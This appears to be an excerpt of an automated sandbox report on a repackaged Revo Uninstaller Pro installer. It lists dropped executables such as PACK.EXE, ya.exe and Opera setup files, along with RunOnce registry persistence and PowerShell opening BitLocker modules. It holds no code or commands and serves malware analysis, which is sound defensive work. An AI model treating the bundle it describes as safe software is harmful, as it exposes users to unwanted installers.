        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\OperaSetup[1].exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeFile created: C:\Users\user\Downloads\OperaSetup.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640052497196.dllJump to dropped file
        Source: C:\Users\user\Downloads\OperaSetup.exeFile created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.sysJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\System.dllJump to dropped file
        Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\System32\drivers\SETE8C2.tmpJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640027403532.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640030686032.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640048718040.dllJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sysJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exeJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\INetC.dllJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Users\user\AppData\Local\Temp\PACK.EXEJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.del (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640042418092.dllJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exeJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412091140041\opera_packageJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUnPro.exeJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\nsExec.dllJump to dropped file
        Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\system32\DRIVERS\revoflt.sys (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeFile created: C:\Users\user\AppData\Local\Temp\nsf82A3.tmp\System.dllJump to dropped file
        Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\System32\drivers\SETE8C2.tmpJump to dropped file
        Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\system32\DRIVERS\revoflt.sys (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\tsjtmfdm[1].pkgJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412091140041\opera_packageJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20241209114003209.log
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20241209114005402.log
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\License.txtJump to behavior

        Boot Survival

        barindex
        Source: C:\Windows\System32\rundll32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConvJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\VS Revo Group\Revo Uninstaller Pro\Uninstaller\AllProgs\RegExclude HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ServicesJump to behavior
        Source: C:\Windows\System32\rundll32.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Revoflt\InstancesJump to behavior
        Source: C:\Windows\System32\rundll32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConvJump to behavior
        Source: C:\Windows\System32\rundll32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConvJump to behavior
        Source: C:\Windows\System32\rundll32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConvJump to behavior
        Source: C:\Windows\System32\rundll32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConvJump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\grpconv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\grpconv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\grpconv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\grpconv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
